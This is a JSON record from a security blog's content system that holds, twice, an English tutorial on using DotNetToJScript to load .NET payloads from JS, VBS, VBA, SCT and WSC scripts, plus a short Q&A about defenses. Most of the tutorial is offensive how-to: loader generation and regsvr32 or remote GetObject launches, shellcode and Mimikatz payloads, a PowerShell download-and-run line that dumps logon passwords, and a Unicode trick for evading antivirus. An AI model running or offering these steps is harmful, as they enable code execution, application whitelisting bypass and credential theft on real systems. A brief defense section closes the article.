[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fOb_93GgiunrC7umfl-naYppXKw5VYJ2YXwxiIXJ5fjs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},44,"What defensive measures does the article recommend against DotNetToJScript attacks?","The article advises restricting execution of JS, VBS, VBA macros, SCT, and WSC scripts separately. It emphasizes that blocking powershell.exe alone is insufficient because PowerShell runspace environments (.NET) can still be accessed. For a comprehensive defense, review the [Loading .Net Programs Using JS](\u002Fnews\u002Floading-net-programs-using-js) article and consider application control policies that limit script execution, similar to methods discussed in [Use Excel.Application object's RegisterXLL() method to load dll](\u002Fnews\u002Fuse-excel-application-objects-registerxll-method-to-load-dll).","\u003Cp>The article advises restricting execution of JS, VBS, VBA macros, SCT, and WSC scripts separately. It emphasizes that blocking powershell.exe alone is insufficient because PowerShell runspace environments (.NET) can still be accessed. For a comprehensive defense, review the [Loading .Net Programs Using JS](\u002Fnews\u002Floading-net-programs-using-js) article and consider application control policies that limit script execution, similar to methods discussed in [Use Excel.Application object&#39;s RegisterXLL() method to load dll](\u002Fnews\u002Fuse-excel-application-objects-registerxll-method-to-load-dll).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Floading-net-programs-using-js\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-defensive-measures-does-the-article-recommend-against-dotnettojscript-attac-1777485346305","defense, script restriction, application whitelisting, PowerShell runspace, VBA macros, regsvr32",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},12,"Loading .Net Programs Using JS","loading-net-programs-using-js","Learn to load .Net programs via JS\u002FVBS scripts using DotNetToJScript. Includes compilation, usage, and payloads like shellcode, Mimikatz, and PowerShell execution.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, James Forshaw open-sourced a tool called DotNetToJScript, which can load .Net programs using JS\u002FVbs scripts, which is quite interesting.\u003C\u002Fp>\u003Cp>Both Casey Smith and Cn33liz have conducted further research on this and open-sourced their exploitation code.\u003C\u002Fp>\u003Cp>This article will systematically organize this technology to help everyone better understand it.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>DotNetToJScript Compilation Method\u003C\u002Fli>\u003Cli>DotNetToJScript Usage Method\u003C\u002Fli>\u003Cli>Executing Shellcode Using JS\u002FVbs\u003C\u002Fli>\u003Cli>Executing PowerShell Scripts Using JS\u002FVbs\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 DotNetToJScript Compilation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>DotNetToJScript download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftyranid\u002FDotNetToJScript\u003C\u002Fp>\u003Cp>Compile using the tool VS2012\u003C\u002Fp>\u003Ch3>Error 1:\u003C\u002Fh3>\u003Cp>Missing assembly reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to add reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ndesk.org\u002FOptions\u003C\u002Fp>\u003Cp>Unzip, Project - Add Reference - Browse - \\ndesk-options-0.2.1.bin\\ndesk-options-0.2.1.bin\\lib\\ndesk-options\\NDesk.Options.dll\u003C\u002Fp>\u003Cp>Next, specify the target framework as .NET Framework 2.0, recompile\u003C\u002Fp>\u003Ch3>Error 2:\u003C\u002Fh3>\u003Cp>Missing assembly reference Linq\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add reference to System.Core.dll 3.5\u003C\u002Fp>\u003Cp>Location:\u003C\u002Fp>\u003Cp>C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll\u003C\u002Fp>\u003Cp>After adding the reference, compilation succeeded, generating DotNetToJScript.exe and ExampleAssembly.dll in two directories respectively\u003C\u002Fp>\u003Ch2>0x03 DotNetToJScript Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate js script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o 1.js ExampleAssembly.dll\u003C\u002Fp>\u003Cp>After execution, 1.js is generated\u003C\u002Fp>\u003Cp>Execute 1.js to call public TestClass() in ExampleAssembly.dll\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019779827_0_bec909168f.jpeg\">\u003C\u002Fp>\u003Cp>The execution process is as shown below, a dialog box pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019789851_1_7938ed062e.jpeg\">\u003C\u002Fp>\u003Ch3>2. Generate vbs script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Execution is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019799588_2_772e8a2996.jpeg\">\u003C\u002Fp>\u003Ch3>3. Generate VBA script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll\u003C\u002Fp>\u003Cp>To be placed in Office macros\u003C\u002Fp>\u003Ch3>4. Generate SCT script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Command line parameters are as follows:\u003C\u002Fp>\u003Cp>regsvr32.exe \u002Fu \u002Fn \u002Fs \u002Fi:3.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, refer to the previous article 'Use SCT to Bypass Application Whitelisting Protection'\u003C\u002Fp>\u003Ch3>5. Generate wsc script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -m -o 4.wsc ExampleAssembly.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 1: Local invocation\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Call via js, the js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:C:\\\\test\\\\4.wsc\");\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Absolute path required, wsc file extension can be arbitrary\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 2: Remote startup\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save 4.wsc on GitHub, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\u003C\u002Fp>\u003Cp>js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\")\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, please refer to the previous article 'WSC, JSRAT and WMI Backdoor'\u003C\u002Fp>\u003Ch2>0x04 Summary of payloads achievable using JS\u002FVbs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the ExampleAssembly.dll in the above tests, it can be replaced with other payloads:\u003C\u002Fp>\u003Ch3>1. Execute shellcode\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F618d40aa4229581925eb9025429d8420#gistcomment-2057305\u003C\u002Fp>\u003Cp>Create a new C# project, you can choose a C# console application, compile it into an exe\u003C\u002Fp>\u003Cp>The parameters for generating the js script are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o shellcode.js shellcode.exe\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019813083_3_6f5a16e5fd.jpeg\">\u003C\u002Fp>\u003Ch3>2. Execute mimikatz\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fb30e0bcc7645c790fcd993cfd0ad622f\u003C\u002Fp>\u003Cp>For executing Mimikatz code in C#, refer to the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F5c636b8736530fb20c3d\u003C\u002Fp>\u003Ch3>3. Execute PowerShell\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u003C\u002Fp>\u003Cp>Author: Cn33liz\u003C\u002Fp>\u003Cp>\u003Cstrong>StarFighters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Capable of loading Empire framework startup code\u003C\u002Fli>\u003Cli>Supports JavaScript and VBScript\u003C\u002Fli>\u003Cli>Does not require powershell.exe, can be used to bypass whitelist blocking\u003C\u002Fli>\u003Cli>Executes PowerShell code via PowerShell runspace environment (.NET)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods of executing PowerShell code, refer to the project p0wnedShell, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002Fp0wnedShell\u003C\u002Fp>\u003Cp>I previously researched this, streamlined its code to support .NET 2.0, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>StarFighters can not only load the startup code of the Empire framework, but also be used to directly execute PowerShell commands\u003C\u002Fp>\u003Cp>\u003Cstrong>Method as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Execute a single PowerShell command\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command needs to be base64 encoded, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = 'start calc.exe'\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The resulting base64 code is:\u003C\u002Fp>\u003Cp>cwB0AGEAcgB0ACAAYwBhAGwAYwAuAGUAeABlAA==\u003C\u002Fp>\u003Cp>Replace var EncodedPayload in StarFighter.js\u003C\u002Fp>\u003Cp>Successfully executed, calculator pops up as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019825348_4_26ebd85135.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2) Execute PowerShell script locally\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Mimikatz.ps1, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1\u003C\u002Fp>\u003Cp>Add the operation code for exporting credentials:\u003C\u002Fp>\u003Cp>Invoke-Mimikatz -Command \"log privilege::debug sekurlsa::logonpasswords\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding the log parameter is to export the results to the file mimikatz.log\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path Invoke-Mimikatz.ps1\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content from the generated 1.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Remote execution of PowerShell script\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell command as follows:\u003C\u002Fp>\u003Cp>powershell IEX \"(New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'\"\u003C\u002Fp>\u003Cp>The code for base64 encoding is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 2.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content generated in 2.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A certain antivirus software will detect and kill this js script by default. A method to bypass static detection (no guarantee of validity):\u003C\u002Fp>\u003Cul>\u003Cli>Save the script in ASCII format, it will be detected and killed\u003C\u002Fli>\u003Cli>Switch to UNICODE format, it will not be detected and killed\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, everyone will block powerShell.exe, but this is far from enough:\u003C\u002Fp>\u003Cp>\u003Cstrong>powershell runspace environment (.NET) is the key\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically for the techniques in this article, the defense methods are as follows:\u003C\u002Fp>\u003Cp>Restrict js, vbs, vba macros, sct, and wsc scripts separately\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, James Forshaw open-sourced a tool called DotNetToJScript, which can load .Net programs using JS\u002FVbs scripts, which is quite interesting.\u003C\u002Fp>\u003Cp>Both Casey Smith and Cn33liz have conducted further research on this and open-sourced their exploitation code.\u003C\u002Fp>\u003Cp>This article will systematically organize this technology to help everyone better understand it.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>DotNetToJScript Compilation Method\u003C\u002Fli>\u003Cli>DotNetToJScript Usage Method\u003C\u002Fli>\u003Cli>Executing Shellcode Using JS\u002FVbs\u003C\u002Fli>\u003Cli>Executing PowerShell Scripts Using JS\u002FVbs\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 DotNetToJScript Compilation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>DotNetToJScript download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftyranid\u002FDotNetToJScript\u003C\u002Fp>\u003Cp>Compile using the tool VS2012\u003C\u002Fp>\u003Ch3>Error 1:\u003C\u002Fh3>\u003Cp>Missing assembly reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to add reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ndesk.org\u002FOptions\u003C\u002Fp>\u003Cp>Unzip, Project - Add Reference - Browse - \\ndesk-options-0.2.1.bin\\ndesk-options-0.2.1.bin\\lib\\ndesk-options\\NDesk.Options.dll\u003C\u002Fp>\u003Cp>Next, specify the target framework as .NET Framework 2.0, recompile\u003C\u002Fp>\u003Ch3>Error 2:\u003C\u002Fh3>\u003Cp>Missing assembly reference Linq\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add reference to System.Core.dll 3.5\u003C\u002Fp>\u003Cp>Location:\u003C\u002Fp>\u003Cp>C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll\u003C\u002Fp>\u003Cp>After adding the reference, compilation succeeded, generating DotNetToJScript.exe and ExampleAssembly.dll in two directories respectively\u003C\u002Fp>\u003Ch2>0x03 DotNetToJScript Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate js script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o 1.js ExampleAssembly.dll\u003C\u002Fp>\u003Cp>After execution, 1.js is generated\u003C\u002Fp>\u003Cp>Execute 1.js to call public TestClass() in ExampleAssembly.dll\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019779827_0_bec909168f-1.jpeg\">\u003C\u002Fp>\u003Cp>The execution process is as shown below, a dialog box pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019789851_1_7938ed062e-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Generate vbs script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Execution is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019799588_2_772e8a2996-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Generate VBA script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll\u003C\u002Fp>\u003Cp>To be placed in Office macros\u003C\u002Fp>\u003Ch3>4. Generate SCT script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Command line parameters are as follows:\u003C\u002Fp>\u003Cp>regsvr32.exe \u002Fu \u002Fn \u002Fs \u002Fi:3.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, refer to the previous article 'Use SCT to Bypass Application Whitelisting Protection'\u003C\u002Fp>\u003Ch3>5. Generate wsc script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -m -o 4.wsc ExampleAssembly.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 1: Local invocation\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Call via js, the js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:C:\\\\test\\\\4.wsc\");\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Absolute path required, wsc file extension can be arbitrary\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 2: Remote startup\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save 4.wsc on GitHub, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\u003C\u002Fp>\u003Cp>js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\")\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, please refer to the previous article 'WSC, JSRAT and WMI Backdoor'\u003C\u002Fp>\u003Ch2>0x04 Summary of payloads achievable using JS\u002FVbs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the ExampleAssembly.dll in the above tests, it can be replaced with other payloads:\u003C\u002Fp>\u003Ch3>1. Execute shellcode\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F618d40aa4229581925eb9025429d8420#gistcomment-2057305\u003C\u002Fp>\u003Cp>Create a new C# project, you can choose a C# console application, compile it into an exe\u003C\u002Fp>\u003Cp>The parameters for generating the js script are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o shellcode.js shellcode.exe\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019813083_3_6f5a16e5fd-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Execute mimikatz\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fb30e0bcc7645c790fcd993cfd0ad622f\u003C\u002Fp>\u003Cp>For executing Mimikatz code in C#, refer to the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F5c636b8736530fb20c3d\u003C\u002Fp>\u003Ch3>3. Execute PowerShell\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u003C\u002Fp>\u003Cp>Author: Cn33liz\u003C\u002Fp>\u003Cp>\u003Cstrong>StarFighters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Capable of loading Empire framework startup code\u003C\u002Fli>\u003Cli>Supports JavaScript and VBScript\u003C\u002Fli>\u003Cli>Does not require powershell.exe, can be used to bypass whitelist blocking\u003C\u002Fli>\u003Cli>Executes PowerShell code via PowerShell runspace environment (.NET)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods of executing PowerShell code, refer to the project p0wnedShell, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002Fp0wnedShell\u003C\u002Fp>\u003Cp>I previously researched this, streamlined its code to support .NET 2.0, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>StarFighters can not only load the startup code of the Empire framework, but also be used to directly execute PowerShell commands\u003C\u002Fp>\u003Cp>\u003Cstrong>Method as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Execute a single PowerShell command\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command needs to be base64 encoded, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = 'start calc.exe'\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The resulting base64 code is:\u003C\u002Fp>\u003Cp>cwB0AGEAcgB0ACAAYwBhAGwAYwAuAGUAeABlAA==\u003C\u002Fp>\u003Cp>Replace var EncodedPayload in StarFighter.js\u003C\u002Fp>\u003Cp>Successfully executed, calculator pops up as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019825348_4_26ebd85135-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2) Execute PowerShell script locally\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Mimikatz.ps1, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1\u003C\u002Fp>\u003Cp>Add the operation code for exporting credentials:\u003C\u002Fp>\u003Cp>Invoke-Mimikatz -Command \"log privilege::debug sekurlsa::logonpasswords\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding the log parameter is to export the results to the file mimikatz.log\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path Invoke-Mimikatz.ps1\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content from the generated 1.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Remote execution of PowerShell script\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell command as follows:\u003C\u002Fp>\u003Cp>powershell IEX \"(New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'\"\u003C\u002Fp>\u003Cp>The code for base64 encoding is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 2.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content generated in 2.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A certain antivirus software will detect and kill this js script by default. A method to bypass static detection (no guarantee of validity):\u003C\u002Fp>\u003Cul>\u003Cli>Save the script in ASCII format, it will be detected and killed\u003C\u002Fli>\u003Cli>Switch to UNICODE format, it will not be detected and killed\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, everyone will block powerShell.exe, but this is far from enough:\u003C\u002Fp>\u003Cp>\u003Cstrong>powershell runspace environment (.NET) is the key\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically for the techniques in this article, the defense methods are as follows:\u003C\u002Fp>\u003Cp>Restrict js, vbs, vba macros, sct, and wsc scripts separately\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1767,"Onedaysec",4,"published","2026-02-02T08:20:05.028Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Load .Net Programs with JS\u002FVBS: DotNetToJScript Guide & Payloads","DotNetToJScript, .Net, JS, VBS, shellcode, PowerShell, Mimikatz, payload, bypass, exploitation",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46,47],45,43,42,41,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.833Z","2026-07-23T16:00:55.058Z","draft","2026-07-23T16:03:08.862Z"]